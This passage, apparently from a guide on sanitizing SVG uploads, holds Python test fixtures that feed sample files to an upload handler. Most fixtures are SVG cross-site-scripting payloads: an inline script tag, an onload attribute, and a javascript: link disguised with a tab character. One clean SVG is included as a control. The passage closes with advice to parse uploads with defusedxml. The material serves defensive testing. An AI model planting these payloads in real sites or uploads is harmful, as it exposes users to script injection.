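<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>"""
ONLOAD_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><rect width="1" height="1"/></svg>'
HREF_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            b'<a xlink:href="java\tscript:alert(1)"><text y="10">x</text></a></svg>')
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4" fill="#009900"/></svg>'

if __name__ == "__main__":
    for label, sample in [("advisory payload", ADVISORY_PAYLOAD), ("onload", ONLOAD_SVG),
                          ("javascript: href", HREF_SVG), ("clean", CLEAN_SVG)]:
        print(label, "->", handle_upload("upload.svg", sample))
```

For a production gate, parse with defusedxml instead of the stdlib parser so entity-expansion tricks in the DOCTYPE are refused as well.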